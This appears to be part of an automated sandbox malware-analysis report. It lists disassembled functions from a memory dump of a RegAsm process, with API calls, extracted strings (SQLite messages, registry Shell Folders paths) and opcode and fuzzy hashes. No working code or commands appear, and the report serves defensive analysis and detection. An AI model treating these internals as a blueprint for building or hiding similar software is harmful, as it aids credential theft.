                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                                • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4131475296-0
                                                                                                                                                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                                                                • Opcode ID: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                • Opcode Fuzzy Hash: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                                                                • Opcode ID: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
